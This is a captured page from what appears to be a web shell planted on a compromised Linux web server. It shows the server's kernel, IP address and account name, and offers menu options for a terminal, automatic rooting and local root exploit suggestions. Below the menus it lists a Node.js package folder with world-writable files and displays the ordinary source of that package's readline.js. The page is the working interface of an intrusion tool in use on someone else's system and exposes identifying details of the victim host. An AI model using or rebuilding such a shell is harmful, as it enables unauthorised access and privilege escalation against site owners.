Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.216.199
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
node_modules /
mz /
Delete
Unzip
Name
Size
Permission
Date
Action
HISTORY.md
1.11
KB
-rw-rw-rw-
2025-03-24 11:44
LICENSE
1.09
KB
-rw-rw-rw-
2025-03-24 11:44
README.md
2.83
KB
-rw-rw-rw-
2025-03-24 11:44
child_process.js
113
B
-rw-rw-rw-
2025-03-24 11:44
crypto.js
135
B
-rw-rw-rw-
2025-03-24 11:44
dns.js
240
B
-rw-rw-rw-
2025-03-24 11:44
fs.js
1.02
KB
-rw-rw-rw-
2025-03-24 11:44
index.js
206
B
-rw-rw-rw-
2025-03-24 11:44
package.json
1012
B
-rw-rw-rw-
2025-03-24 11:44
readline.js
1.64
KB
-rw-rw-rw-
2025-03-24 11:44
zlib.js
181
B
-rw-rw-rw-
2025-03-24 11:44
Save
Rename
var readline = require('readline') var Promise = require('any-promise') var objectAssign = require('object-assign') var Interface = readline.Interface function wrapCompleter (completer) { if (completer.length === 2) return completer return function (line, cb) { var result = completer(line) if (typeof result.then !== 'function') { return cb(null, result) } result.catch(cb).then(function (result) { process.nextTick(function () { cb(null, result) }) }) } } function InterfaceAsPromised (input, output, completer, terminal) { if (arguments.length === 1) { var options = input if (typeof options.completer === 'function') { options = objectAssign({}, options, { completer: wrapCompleter(options.completer) }) } Interface.call(this, options) } else { if (typeof completer === 'function') { completer = wrapCompleter(completer) } Interface.call(this, input, output, completer, terminal) } } InterfaceAsPromised.prototype = Object.create(Interface.prototype) InterfaceAsPromised.prototype.question = function (question, callback) { if (typeof callback === 'function') { return Interface.prototype.question.call(this, question, callback) } var self = this return new Promise(function (resolve) { Interface.prototype.question.call(self, question, resolve) }) } objectAssign(exports, readline, { Interface: InterfaceAsPromised, createInterface: function (input, output, completer, terminal) { if (arguments.length === 1) { return new InterfaceAsPromised(input) } return new InterfaceAsPromised(input, output, completer, terminal) } })